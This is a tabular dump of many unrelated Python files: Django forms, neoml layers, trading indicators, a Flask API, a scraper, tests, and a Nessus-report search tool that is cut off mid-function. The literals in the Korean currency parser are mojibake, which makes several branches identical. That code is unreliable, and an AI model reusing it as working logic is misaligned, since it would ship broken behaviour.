text string | size int64 | token_count int64 |
|---|---|---|
'''
The MIT License (MIT)
Copyright (c) 2014 NTHUOJ team
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import datetime
from django import forms
from django.views.generic.edit import UpdateView
from contest.models import Contest
from contest.models import Clarification
from contest.contest_info import get_freeze_time_datetime
from users.models import User
from datetimewidget.widgets import DateTimeWidget, DateWidget, TimeWidget
from problem.models import Problem
from django.db.models import Q
class ContestForm(forms.ModelForm):
    """Create/edit form for a Contest.

    Uses bootstrap datetime pickers for start/end time and restricts the
    coowner/problem choices according to the requesting user, which is
    passed in through the form's ``initial`` dict.
    """

    # Options forwarded to the bootstrap-3 datetime picker widgets.
    dateTimeOptions = {
        'format': 'yyyy-mm-dd hh:ii:00',
        'todayBtn': 'true',
        'minuteStep': 1,
    }
    start_time = forms.DateTimeField(
        widget=DateTimeWidget(options=dateTimeOptions, bootstrap_version=3))
    end_time = forms.DateTimeField(
        widget=DateTimeWidget(options=dateTimeOptions, bootstrap_version=3))

    def __init__(self, *args, **kwargs):
        """Narrow the coowner and problem querysets.

        Expects ``initial`` to optionally carry: ``user`` (requesting user),
        ``owner`` (contest owner), ``method`` ('GET'/'POST') and ``id``
        (contest pk when editing).
        """
        super(ContestForm, self).__init__(*args, **kwargs)
        # access object through self.instance...
        initial = kwargs.get('initial', {})
        user = initial.get('user', User())
        owner = initial.get('owner', User())
        method = initial.get('method', '')
        # Co-owner candidates: any non-basic user, excluding the owner.
        self.fields['coowner'].queryset = User.objects.exclude(
            Q(user_level=User.USER) | Q(pk=owner))
        if method == 'GET':
            contest_id = initial.get('id', 0)
            # Admins keep the default queryset (all problems).
            if not user.has_admin_auth():
                if contest_id:
                    # Editing: visible/owned problems, plus whatever is
                    # already attached to this contest.
                    contest = Contest.objects.get(pk=contest_id)
                    contest_problems = contest.problem.all().distinct()
                    self.fields['problem'].queryset = Problem.objects.filter(
                        Q(visible=True) | Q(owner=user)).distinct() | contest_problems
                else:
                    # Creating: only visible problems or the user's own.
                    self.fields['problem'].queryset = Problem.objects.filter(
                        Q(visible=True) | Q(owner=user))
        elif method == 'POST':
            self.fields['problem'].queryset = Problem.objects.all()

    class Meta:
        model = Contest
        fields = (
            'cname',
            'owner',
            'coowner',
            'start_time',
            'end_time',
            'freeze_time',
            'problem',
            'is_homework',
            'open_register',
        )

    def clean_freeze_time(self):
        """Ensure the freeze window (minutes) fits inside the contest.

        Bug fix: sibling fields that failed their own validation show up
        in cleaned_data as None; the arithmetic previously crashed with a
        TypeError instead of letting those fields report their own error.
        """
        start_time = self.cleaned_data.get("start_time")
        freeze_time = self.cleaned_data.get("freeze_time")
        end_time = self.cleaned_data.get("end_time")
        if (isinstance(end_time, datetime.datetime)
                and isinstance(start_time, datetime.datetime)
                and freeze_time is not None):
            if end_time - datetime.timedelta(minutes=freeze_time) <= start_time:
                raise forms.ValidationError(
                    "Freeze time cannot be longer than Contest duration.")
        return freeze_time

    def clean_end_time(self):
        """Ensure end_time is strictly after start_time.

        Bug fix: guard against start_time being None (its own validation
        failed) to avoid a TypeError on comparison.
        """
        start_time = self.cleaned_data.get("start_time")
        end_time = self.cleaned_data.get("end_time")
        if start_time is not None and end_time is not None and end_time <= start_time:
            raise forms.ValidationError(
                "End time cannot be earlier than start time.")
        return end_time
class ClarificationForm(forms.ModelForm):
    """Form for asking a clarification.

    The problem choices are limited to the problems of the contest passed
    in via ``initial['contest']``.
    """

    def __init__(self, *args, **kwargs):
        super(ClarificationForm, self).__init__(*args, **kwargs)
        # only problems contest contains will be shown in list
        initial = kwargs.get('initial', {})
        contest = initial.get('contest', {})
        # isinstance (instead of `type(...) is`) also accepts Contest
        # subclasses such as deferred model instances.
        if isinstance(contest, Contest):
            # Fix: reuse the Contest instance we already hold; the old code
            # re-fetched the same row with Contest.objects.get(id=...).
            self.fields['problem'] = forms.ChoiceField(
                choices=[(problem.id, problem.pname)
                         for problem in contest.problem.all()])

    class Meta:
        model = Clarification
        fields = (
            'contest',
            'problem',
            'content',
            'asker',
        )
        widgets = {
            'content': forms.Textarea(),
        }
class ReplyForm(forms.ModelForm):
    """Form for replying to a clarification.

    The clarification choices are limited to those belonging to the
    contest passed in via ``initial['contest']``.
    """

    def __init__(self, *args, **kwargs):
        super(ReplyForm, self).__init__(*args, **kwargs)
        # only clarifications of this contest will be shown in the list
        initial = kwargs.get('initial', {})
        contest = initial.get('contest', {})
        # isinstance (instead of `type(...) is`) also accepts Contest subclasses.
        if isinstance(contest, Contest):
            clarifications = Clarification.objects.filter(contest=contest)
            # Idiom: iterate the queryset directly; `.all()` on a queryset
            # is just a redundant copy.
            self.fields['clarification'] = forms.ChoiceField(
                choices=[(clarification.id, clarification.content)
                         for clarification in clarifications])

    class Meta:
        model = Clarification
        fields = (
            'reply',
            'replier',
            'reply_time',
            'reply_all'
        )
        widgets = {
            'reply': forms.Textarea(),
        }
| 6,013 | 1,690 |
"""
Wrapper to save the training data to different file formats
"""
class GenericFileWriter(object):
    """
    Write data to different file formats depending on the injected
    open_file and write_file callables.

    Parameters:
        open_file: zero-argument callable returning a context manager
            (e.g. ``lambda: open(path, "w")``).
        write_file: callable ``(file_object, data)`` performing one write.
    """

    def __init__(self, open_file=None, write_file=None):
        self.open_file = open_file
        self.write_file = write_file

    def __enter__(self):
        self.f = self.open_file()
        self.f.__enter__()
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Bug fix: propagate the wrapped manager's __exit__ return value.
        # Returning None unconditionally discarded its exception
        # suppression (a truthy return means "swallow the exception").
        return self.f.__exit__(exc_type, exc_val, exc_tb)

    def write(self, data):
        self.write_file(self.f, data)
| 618 | 196 |
# Generated by Django 2.2 on 2020-03-30 14:01
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated schema migration (Django 2.2): re-declares the
    # `quantity` column on three models as IntegerField(default=0) with a
    # localized verbose_name. Generated code — do not edit by hand.

    dependencies = [
        ('users', '0006_auto_20200330_2200'),
    ]

    operations = [
        migrations.AlterField(
            model_name='boughtproduct',
            name='quantity',
            field=models.IntegerField(default=0, verbose_name='ไบงๅๆฐ้'),
        ),
        migrations.AlterField(
            model_name='shoppingcart',
            name='quantity',
            field=models.IntegerField(default=0, verbose_name='ไบงๅๆฐ้'),
        ),
        migrations.AlterField(
            model_name='traderecord',
            name='quantity',
            field=models.IntegerField(default=0, verbose_name='ไบงๅๆฐ้'),
        ),
    ]
| 772 | 255 |
""" Copyright (c) 2017-2020 ABBYY Production LLC
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
--------------------------------------------------------------------------------------------------------------*/
"""
import neoml.PythonWrapper as PythonWrapper
from .Dnn import Layer
from neoml.Utils import check_input_layers
class ImageResize(Layer):
    """Resizes a set of two-dimensional multi-channel images.

    The output keeps BatchLength, BatchWidth, ListSize, Depth, and
    Channels of the input; Height/Width change by the sums of the
    top/bottom and left/right deltas respectively.

    Parameters
    ----------
    input_layer : (object, int)
        The input layer and the number of its output (first output is
        used when no number is given).
    deltas : ("left", "right", "top", "bottom")
        Size change on each side: negative values crop rows/columns,
        positive values pad with `default_value` pixels.
    default_value : float, default=0.0
        The value for added pixels.
    name : str, default=None
        The layer name.
    """

    def __init__(self, input_layer, deltas, default_value=0.0, name=None):
        # Wrapping an already-created native layer object.
        if type(input_layer) is PythonWrapper.ImageResize:
            super().__init__(input_layer)
            return
        layers, outputs = check_input_layers(input_layer, 1)
        if len(deltas) != 4:
            raise ValueError('The `deltas` must contain 4 elements.')
        left, right, top, bottom = (int(d) for d in deltas)
        wrapped = PythonWrapper.ImageResize(str(name), layers[0], int(outputs[0]),
                                            left, right, top, bottom, default_value)
        super().__init__(wrapped)

    @property
    def deltas(self):
        """The size difference on each side."""
        return self._internal.get_deltas()

    @deltas.setter
    def deltas(self, deltas):
        """Sets the size difference on each side."""
        if len(deltas) != 4:
            raise ValueError('The `deltas` must contain 4 elements.')
        self._internal.set_deltas(deltas)

    @property
    def default_value(self):
        """The value used for newly added pixels."""
        return self._internal.get_default_value()

    @default_value.setter
    def default_value(self, default_value):
        """Sets the value used for newly added pixels."""
        self._internal.set_default_value(default_value)
# ----------------------------------------------------------------------------------------------------------------------
class PixelToImage(Layer):
    """Builds a set of two-dimensional images from pixel sequences with
    explicit coordinates.

    Input #1 holds the pixel sequences (BatchWidth sequences of ListSize
    pixels, Channels channels each); input #2 holds integer pixel
    coordinates with matching BatchWidth/ListSize. The output is one
    Height x Width image per sequence, with the same Channels count.

    Parameters
    ----------
    input_layer : (object, int)
        The input layer and the number of its output (first output is
        used when no number is given).
    height : int
        The height of the resulting images.
    width : int
        The width of the resulting images.
    name : str, default=None
        The layer name.
    """

    def __init__(self, input_layer, height, width, name=None):
        # Wrapping an already-created native layer object.
        if type(input_layer) is PythonWrapper.PixelToImage:
            super().__init__(input_layer)
            return
        if height < 1:
            raise ValueError('The `height` must be > 0.')
        if width < 1:
            raise ValueError('The `width` must be > 0.')
        layers, outputs = check_input_layers(input_layer, 2)
        wrapped = PythonWrapper.PixelToImage(
            str(name), layers[0], int(outputs[0]), layers[1], int(outputs[1]),
            int(height), int(width))
        super().__init__(wrapped)

    @property
    def height(self):
        """The output image height."""
        return self._internal.get_height()

    @height.setter
    def height(self, height):
        """Sets the output image height."""
        if height < 1:
            raise ValueError('The `height` must be > 0.')
        self._internal.set_height(height)

    @property
    def width(self):
        """The output image width."""
        return self._internal.get_width()

    @width.setter
    def width(self, width):
        """Sets the output image width."""
        if width < 1:
            raise ValueError('The `width` must be > 0.')
        self._internal.set_width(width)
# ----------------------------------------------------------------------------------------------------------------------
class ImageToPixel(Layer):
    """Extracts pixel sequences at the given coordinates from a set of
    two-dimensional images.

    Input #1 holds the images (BatchWidth images, Height x Width, with
    Channels channels); input #2 holds the integer coordinate sequences
    (same BatchWidth, ListSize coordinates each). The output holds one
    pixel sequence per image with the input's Channels count.

    Parameters
    ----------
    input_layer : (object, int)
        The input layer and the number of its output (first output is
        used when no number is given).
    name : str, default=None
        The layer name.
    """

    def __init__(self, input_layer, name=None):
        # Wrapping an already-created native layer object.
        if type(input_layer) is PythonWrapper.ImageToPixel:
            super().__init__(input_layer)
            return
        layers, outputs = check_input_layers(input_layer, 2)
        # NOTE(review): unlike PixelToImage, both layers are passed before
        # both output indices here — presumably matching the native
        # constructor's signature; confirm against PythonWrapper.
        wrapped = PythonWrapper.ImageToPixel(str(name), layers[0], layers[1],
                                             int(outputs[0]), int(outputs[1]))
        super().__init__(wrapped)
| 8,087 | 2,249 |
import time
import random
import pyson
# Template evaluated by pyson: unlike strict JSON, keys and values may be
# Python expressions evaluated against the supplied namespaces.
content = """
{
    "time" : time.time(),
    random.randint(0, 1) : "a random number",
    "another_level" : {
        "test" : 5
    },
    "main level" : True
}
"""
# SECURITY NOTE(review): pyson.loads evaluates arbitrary expressions with
# full access to globals()/locals() — never feed it untrusted input.
print(pyson.loads(content, globals(), locals()))
import pandas as pd
import numpy as np
def rsi_tradingview(ohlc: pd.DataFrame, period):
    """Compute a TradingView-style RSI from the "close" column.

    Gains/losses are smoothed with an exponentially weighted mean
    (alpha = 1/period). Mutates `ohlc` in place by adding an "RSI"
    column and returns the same DataFrame.
    """
    change = ohlc["close"].diff()
    # Split the price change into positive gains and positive losses;
    # clip() keeps the leading NaN, exactly like masked assignment did.
    gains = change.clip(lower=0)
    losses = -change.clip(upper=0)
    avg_gain = gains.ewm(alpha=1 / period).mean()
    avg_loss = losses.ewm(alpha=1 / period).mean()
    # 0 when there were no gains at all, 100 when there were no losses.
    rsi = np.where(
        avg_gain == 0, 0,
        np.where(avg_loss == 0, 100, 100 - (100 / (1 + avg_gain / avg_loss))),
    )
    ohlc["RSI"] = rsi
    return ohlc
def WMA(s, period):
    """Linearly weighted moving average of Series `s`.

    Within each window of length `period`, the newest sample gets weight
    `period` and the oldest gets weight 1.
    """
    weights = np.arange(1, period + 1)
    total = weights.sum()
    return s.rolling(period).apply(
        lambda window: (weights * window).sum() / total, raw=True)
def HMA(s, period):
    """Hull moving average: WMA over sqrt(period) of 2*WMA(period/2) - WMA(period)."""
    half = WMA(s, period // 2)
    full = WMA(s, period)
    detrended = half.multiply(2).sub(full)
    return WMA(detrended, int(np.sqrt(period)))
# -*- coding: utf-8 -*-
"""
This module extends the default output formatting to include HTML.
"""
import sys
import datetime
from jinja2 import Template
def html_output(source, header, thresholds):
    """Render the HTML report for one analyzed source file.

    Args:
        source: object exposing `filename` and `function_list` attributes.
        header: report header passed through to the template.
        thresholds: threshold settings passed through to the template.

    Returns:
        The rendered HTML report as a string.
    """
    source_file_dict = {
        "filename": source.filename,
        # Idiom: comprehension instead of an append loop; falsy entries
        # are skipped just as before.
        "functions": [func.__dict__ for func in source.function_list if func],
    }
    # Template path is resolved relative to the current working directory.
    # Fix: read with an explicit encoding so the report renders the same
    # regardless of the platform's default locale encoding.
    with open("./assets/report.html", encoding="utf-8") as f:
        output = Template(f.read()).render(
            header=header,
            date=datetime.datetime.now().strftime("%Y-%m-%d %H:%M"),
            thresholds=thresholds,
            argument=source_file_dict,
        )
    return output
| 808 | 233 |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import NLP
def calculate(tags):
    """Parse a POS-tagged Korean phrase into a currency-conversion query.

    Returns (str_query, to_measure, str_humanize):
      - str_query: 6-letter pair code, e.g. "USDKRW"
      - to_measure: integer amount (value * multiplier)
      - str_humanize: human-readable currency names, [from, to]

    NOTE(review): non-ASCII literals below are copied verbatim from the
    (encoding-damaged) original; some KRW and JPY word branches appear
    byte-identical here and may therefore be unreachable — verify against
    the original file's encoding.
    """
    tmp_str = " ".join(str(val) for val in tags)
    # NLP.calculate_also_pos returns (token, POS-tag) pairs.
    tmp_tags = NLP.calculate_also_pos(tmp_str)
    print(tmp_tags)
    lst_query = ["USD", "KRW"]  # default: USD -> KRW conversion
    str_humanize = ["๋ฌ๋ฌ", "์"]  # default human-readable names
    indicator = 0  # which side of the pair the next currency word fills
    cursor = 0  # index of the last meaningful token
    value_of_currency = 1
    multiplier = 1
    for idx, val in enumerate(tmp_tags):
        if val[1] == "Number":
            # A bare number close to the cursor is the amount itself.
            if (idx - cursor) < 2:
                value_of_currency = float(val[0])
            # Scale words (ten/hundred/.../billion) tagged as Number.
            if (idx - cursor) < 3:
                if val[0] == "์ญ":
                    multiplier = 10
                    cursor = idx
                if val[0] == "๋ฐฑ":
                    multiplier = 100
                    cursor = idx
                if val[0] == "์ฒ":
                    multiplier = 1000
                    cursor = idx
                if val[0] == "๋ง":
                    multiplier = 10000
                    cursor = idx
                if val[0] == "์ญ๋ง":
                    multiplier = 100000
                    cursor = idx
                if val[0] == "๋ฐฑ๋ง":
                    multiplier = 1000000
                    cursor = idx
                if val[0] == "์ฒ๋ง":
                    multiplier = 10000000
                    cursor = idx
                if val[0] == "์ต":
                    multiplier = 100000000
                    cursor = idx
                if val[0] == "์ญ์ต":
                    multiplier = 1000000000
                    cursor = idx
        # Currency words: set the pair slot, optionally with a fused scale
        # (e.g. "ten-thousand-won" sets both the currency and multiplier).
        # NOTE(review): indicator is not bounded; a phrase naming three or
        # more currencies would raise IndexError on str_humanize[indicator].
        if (val[0] == "์") or (val[0] == "์ํ") or (val[0] == "KRW"):
            str_humanize[indicator] = "์"
            lst_query[indicator] = "KRW"
            cursor = idx
            indicator += 1
        elif val[0] == "์ญ์":
            str_humanize[indicator] = "์"
            lst_query[indicator] = "KRW"
            cursor = idx
            multiplier = 10
            indicator += 1
        elif val[0] == "๋ฐฑ์":
            str_humanize[indicator] = "์"
            lst_query[indicator] = "KRW"
            cursor = idx
            multiplier = 100
            indicator += 1
        elif val[0] == "์ฒ์":
            str_humanize[indicator] = "์"
            lst_query[indicator] = "KRW"
            cursor = idx
            multiplier = 1000
            indicator += 1
        elif val[0] == "๋ง์":
            str_humanize[indicator] = "์"
            lst_query[indicator] = "KRW"
            cursor = idx
            multiplier = 10000
            indicator += 1
        elif val[0] == "์ญ๋ง์":
            str_humanize[indicator] = "์"
            lst_query[indicator] = "KRW"
            cursor = idx
            multiplier = 100000
            indicator += 1
        elif val[0] == "๋ฐฑ๋ง์":
            str_humanize[indicator] = "์"
            lst_query[indicator] = "KRW"
            cursor = idx
            multiplier = 1000000
            indicator += 1
        elif val[0] == "์ฒ๋ง์":
            str_humanize[indicator] = "์"
            lst_query[indicator] = "KRW"
            cursor = idx
            multiplier = 10000000
            indicator += 1
        elif val[0] == "์ต์":
            str_humanize[indicator] = "์"
            lst_query[indicator] = "KRW"
            cursor = idx
            multiplier = 100000000
            indicator += 1
        elif (val[0] == "๋ฌ๋ฌ") or (val[0] == "๋ฌ๋ฌํ"):
            str_humanize[indicator] = "๋ฌ๋ฌ"
            lst_query[indicator] = "USD"
            cursor = idx
            indicator += 1
        elif (val[0] == "์") or (val[0] == "์ํ") or (val[0] == "JPY"):
            str_humanize[indicator] = "์"
            lst_query[indicator] = "JPY"
            cursor = idx
            indicator += 1
        elif val[0] == "์ญ์":
            str_humanize[indicator] = "์"
            lst_query[indicator] = "JPY"
            cursor = idx
            multiplier = 10
            indicator += 1
        elif val[0] == "๋ฐฑ์":
            str_humanize[indicator] = "์"
            lst_query[indicator] = "JPY"
            cursor = idx
            multiplier = 100
            indicator += 1
        elif val[0] == "์ฒ์":
            str_humanize[indicator] = "์"
            lst_query[indicator] = "JPY"
            cursor = idx
            multiplier = 1000
            indicator += 1
        elif val[0] == "๋ง์":
            str_humanize[indicator] = "์"
            lst_query[indicator] = "JPY"
            cursor = idx
            multiplier = 10000
            indicator += 1
        elif val[0] == "์ญ๋ง์":
            str_humanize[indicator] = "์"
            lst_query[indicator] = "JPY"
            cursor = idx
            multiplier = 100000
            indicator += 1
        elif val[0] == "๋ฐฑ๋ง์":
            str_humanize[indicator] = "์"
            lst_query[indicator] = "JPY"
            cursor = idx
            multiplier = 1000000
            indicator += 1
        elif val[0] == "์ฒ๋ง์":
            str_humanize[indicator] = "์"
            lst_query[indicator] = "JPY"
            cursor = idx
            multiplier = 10000000
            indicator += 1
        elif (val[0] == "์ ๋ก") or (val[0] == "์ ๋กํ") or (val[0] == "EUR"):
            str_humanize[indicator] = "์ ๋ก"
            lst_query[indicator] = "EUR"
            cursor = idx
            indicator += 1
        elif (val[0] == "์์") or (val[0] == "์์ํ") or (val[0] == "CNY"):
            str_humanize[indicator] = "์์"
            lst_query[indicator] = "CNY"
            cursor = idx
            indicator += 1
    to_measure = int(value_of_currency * multiplier)
    # When no explicit amount was given but two currencies were, flip the
    # pair so the second-mentioned currency becomes the base.
    if (to_measure == 1) and (not indicator <= 1):
        str_humanize.reverse()
        str_query = lst_query[1] + lst_query[0]
    else:
        str_query = lst_query[0] + lst_query[1]
    return str_query, to_measure, str_humanize
if __name__ == "__main__":
    # Smoke test with a tagged sample phrase ("50 / <scale-won> / how much").
    print(calculate(['50', '๋ง์', '์ผ๋ง']))
| 5,733 | 2,048 |
from marshmallow import fields, validate
from .base import BaseSchema
class PageParamSchema(BaseSchema):
    """Query-parameter schema for pagination; `page` is required and 1-based."""
    page = fields.Integer(required=True, validate=validate.Range(min=1))
| 181 | 52 |
from multiprocessing import Lock
from flask import Flask, request, jsonify
from constants import HOST, PORT
from Database.database import Database
from handler.frontendHandler import frontend_handler
from handler.iotHandler import iot_handler
# Create the flask application
app = Flask(__name__)
# SQLite database file opened anew by every request handler.
db_name = 'test.db'
# Serializes all database access across worker processes.
db_lock = Lock()
# Create a basic route for debugging
@app.route('/')
def index():
    """Debug-only homepage for the API."""
    return '<h1>Hello world</h1>'
# REST for frontend
@app.route('/frontend/<query>', methods=['GET'])
def front_end_get(query):
    """Handle frontend GET requests.

    `query` must be a numeric request type; query-string arguments are
    merged into the body handed to frontend_handler.
    """
    if not query.isdigit():
        # Fix: a Flask view may not return a bare int (`return 404` raised
        # a TypeError at runtime); return a proper (body, status) tuple.
        return 'Not Found', 404
    req_body = {'type': int(query)}
    req_type = request.method
    req_body.update(request.args)
    db_lock.acquire(True)
    try:
        db = Database(db_name)
        result = frontend_handler(req_body, req_type, db)
        del db
    finally:
        # Fix: release in `finally` so an exception in the handler cannot
        # leave the lock held forever, deadlocking all later requests.
        db_lock.release()
    return jsonify(result)
@app.route('/frontend', methods=['POST', 'PUT', 'DELETE'])
def frontend():
    """The endpoint for the frontend application to interact with."""
    # Get the body and the request type
    req_body = request.get_json()
    req_type = request.method
    # Fix: hold the lock via its context manager so it is always released,
    # even when the handler raises; the old acquire/release pair leaked the
    # lock on exceptions and deadlocked subsequent requests.
    with db_lock:
        db = Database(db_name)
        result = frontend_handler(req_body, req_type, db)
        del db
    return jsonify(result)
@app.route('/device', methods = ['GET'])
def iot_get():
    """The endpoint IoT devices poll for work."""
    return jsonify(iot_handler(request.method.lower()))
if __name__ == "__main__":
    # Run the development server; HOST/PORT come from constants.py.
    app.run(HOST, PORT)
| 1,617 | 522 |
# Read an integer n from stdin and print the sum 1 + 2 + ... + n.
n = int(input())
# Idiom: builtin sum over an explicit accumulation loop; identical for
# every n (an empty range for n < 1 sums to 0, just like the old loop).
result = sum(range(1, n + 1))
print(result)
# Exercรญcio Python 055
# Leia o peso de 5 pessoas, mostre o maior e o menor
maior = 0
menor = 0
for p in range(1, 6):
    peso = int(input("Digite o peso:"))
    if p == 1:  # the first reading initialises both extremes
        maior = peso
        menor = peso
    else:
        # Bug fix: the original stored the loop counter `p` instead of the
        # weight `peso`, so maior/menor ended up holding person indexes.
        if peso > maior:
            maior = peso
        if peso < menor:
            menor = peso
print("O maior valor รฉ:", maior)
print("O menor valor รฉ:", menor)
| 452 | 162 |
from bs4 import BeautifulSoup as bs
from pathlib import Path
import os
import glob
import time
import random
import requests
pwd = os.getcwd()
page_counter = 1
URL = "https://www.example.com/companies/?page="
# Creating 'pages' folder if this one exists deletes it's content
try:
    Path(pwd + '/pages').mkdir(parents=True, exist_ok=False)
except FileExistsError:
    print("File Already exists, Deleting it's content...")
    files = glob.glob(pwd + '/pages/*')
    for f in files:
        os.remove(f)
    # Pause so the deletion message is noticed before scraping starts.
    time.sleep(5)
# Fetch pages 1..400 and dump each parsed page to pages/<n>.html.
# NOTE(review): no HTTP status check or User-Agent header — error pages
# are saved as-is; confirm the target site tolerates this.
while page_counter <= 400:
    page = requests.get(URL + str(page_counter))
    soup = bs(page.content, "html.parser")
    # Random back-off every 10 pages to avoid hammering the server.
    if(page_counter % 10 == 0):
        time.sleep(random.randrange(8, 13))
        print(page_counter)
    with open('pages/' + str(page_counter) + ".html", "w", encoding='utf-8') as file:
        file.write(str(soup))
    page_counter += 1
| 886 | 311 |
import os
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker, relationship, backref
Base = declarative_base()

# We are using ORM from sqlalchemy so that we can have a better
# representation of our relationships. The model modules must be imported
# before create_all so their tables are registered on Base.metadata.
from app.db_models.accounts import Accounts
from app.db_models.association_table import AssociationTable
from app.db_models.organisations import Organisations
from app.db_models.users import User

# Bug fix: the existence check used to look for 'x_system_db.db' while the
# engine below connects to 'database.db', and the creation path used a
# literal backslash ('\database.db'), so the schema was created in a file
# the application never read. All paths now point at the same database.
db_path = os.path.join(os.getcwd(), 'database.db')

# To avoid overwriting an existing database
if not os.path.exists(db_path):
    engine = create_engine('sqlite:///' + db_path)
    Base.metadata.create_all(bind=engine)

# Connecting to the (now guaranteed to exist) database
engine = create_engine('sqlite:///' + db_path, echo=False)
Session = sessionmaker(bind=engine)
session = Session()
| 892 | 277 |
import numpy as np
from autumn.models.covid_19.detection import create_cdr_function
def test_cdr_intercept():
    """
    A CDR function must report zero case detection when no tests are performed,
    whatever its calibration point.
    """
    for target_cdr in np.linspace(0.05, 0.5, 10):
        cdr_func = create_cdr_function(1000.0, target_cdr)
        assert cdr_func(0.0) == 0.0
def test_cdr_values():
    """
    The CDR must always be a proportion: bounded by zero and one for every
    calibration point and testing volume.
    """
    test_volumes = list(np.linspace(0.0, 1e3, 11)) + list(np.linspace(0.0, 1e5, 11))
    for target_cdr in np.linspace(0.05, 0.5, 10):
        cdr_func = create_cdr_function(1000.0, target_cdr)
        for volume in test_volumes:
            assert 0.0 <= cdr_func(volume) <= 1.0
| 791 | 330 |
#!/usr/bin/env python3
# Copyright (c) 2019, Richard Hughes All rights reserved.
# Released under the BSD license. Please see LICENSE.md for more information.
import sys
import os
import argparse
import glob
import xml.dom.minidom
import re
# Define command line arguments.
# NOTE: parse_args() runs at import time, so importing this module without
# the required -r/--regex argument exits with a usage error.
parms=argparse.ArgumentParser()
parms.add_argument("-f", "--file", type=str, required=False, default="*.nessus", help="Specify input file(s)")
parms.add_argument("-c", "--case_sensitive", required=False, action="store_true", help="Case sensitive search")
parms.add_argument("-d", "--debug", required=False, action="store_true", help="Debug output")
parms.add_argument("-o", "--output", type=str, required=False, default="xml_min", choices=['xml','xml_min','ipv4',"mac","mac+ipv4","ports","script"], help="Specify output format")
parms.add_argument("-p", "--path", type=str, required=False, default=".", help="Specify location of file(s)")
parms.add_argument("-r", "--regex", type=str, required=True, help="Search expression")
args = vars(parms.parse_args())
# Globals
# Set to True whenever a file cannot be parsed; reported at the end of main().
errorsexist = False
# Main processing
def main(args):
    """Process every matching Nessus file and emit output in the selected format."""
    xml_output = args['output'] == "xml"
    # Wrap everything in a root element when emitting full XML.
    if xml_output:
        print("<NessusClientData_v2>")
    for candidate in glob.glob(args['path'] + "/" + args['file']):
        # Skip empty files outright.
        if os.path.getsize(candidate) > 0:
            procFile(candidate)
    if xml_output:
        print("</NessusClientData_v2>")
    if not args['debug'] and errorsexist:
        print("\nWARNING: Run with -d to see files that could not be processed", file=sys.stderr)
# Process file
def procFile(file):
    """Parse one Nessus v2 XML export and hand it to procDocument.

    Sets the global errorsexist flag when the file cannot be parsed or is
    not a Nessus export.
    """
    global errorsexist
    try:
        doc=xml.dom.minidom.parse(file)
        # Verify this is a Nessus v2 export
        if doc.getElementsByTagName("NessusClientData_v2"):
            # Compile the search expression once per file.
            if not args['case_sensitive']:
                regexp = re.compile(args['regex'], re.IGNORECASE)
            else:
                regexp = re.compile(args['regex'])
            procDocument(doc,regexp)
        else:
            # Fix: the warning wrongly said "Nmap"; these are Nessus exports.
            if args['debug']: print("WARNING: " + file + " is not a valid Nessus output file", file=sys.stderr)
            errorsexist=True
    except Exception:
        # Fix: a bare `except:` also swallowed SystemExit/KeyboardInterrupt.
        if args['debug']: print("WARNING: Unable to parse " + file, file=sys.stderr)
        errorsexist=True
# Process document
def procDocument(doc,regexp):
    """Walk every ReportHost in the document and print matches in the
    format selected by args['output']."""
    # Extract hosts
    hosts=doc.getElementsByTagName("ReportHost")
    for host in hosts:
        # Only hosts whose serialized XML matches the search expression.
        if regexp.search(host.toxml()):
            # Collect host identity tags (IP / FQDN).
            # NOTE(review): addr_mac is never assigned from any tag below,
            # so the "mac" outputs always print an empty address.
            tags=host.getElementsByTagName("tag")
            addr_ipv4=""
            addr_mac=""
            hostname=""
            for tag in tags:
                tagname=tag.getAttribute("name")
                # NOTE(review): firstChild is assumed non-empty; an empty
                # <tag/> would raise AttributeError here.
                tagvalue=tag.firstChild.data
                if tagname == "host-ip": addr_ipv4 = tagvalue
                if tagname == "host-fqdn": hostname = tagvalue
            # Output minimal XML: just the enclosing element of each match.
            if args['output'] == "xml_min":
                hostxml=host.toxml()
                for m in regexp.finditer(hostxml):
                    idxStart = m.start(0)
                    # Back up to the nearest opening '<' before the match.
                    idxStart = hostxml.rfind("<", 0, idxStart)
                    idxEnd = m.end(0)
                    print("")
                    print("Host-FQDN: " + hostname)
                    print("Host-Addr: " + addr_ipv4)
                    print("")
                    print(hostxml[idxStart:idxEnd])
            # Output XML: the whole matching host element.
            elif args['output'] == "xml":
                print(host.toxml())
            # Output addresses
            if args['output'] == "ipv4" and addr_ipv4 != "": print(addr_ipv4)
            if args['output'] == "mac" and addr_mac != "": print(addr_mac)
            if args['output'] == "mac+ipv4" and addr_ipv4 != "": print(addr_mac + "|" + addr_ipv4)
            # Output port list in "ip|port|service|tunnel|open" form.
            if args['output'] == "ports":
                ssl_list = []
                out_list = []
                items=host.getElementsByTagName("ReportItem")
                # First pass: discover which ports carry SSL/TLS.
                for item in items:
                    portid=item.getAttribute("port")
                    plugin=item.getAttribute("pluginName")
                    if plugin == "SSL / TLS Versions Supported":
                        if portid not in ssl_list:
                            ssl_list.append(portid)
                # Second pass: emit one line per distinct matching port.
                for item in items:
                    portid=item.getAttribute("port")
                    name=item.getAttribute("svc_name")
                    if name == "www": name = "http"
                    tunnel=""
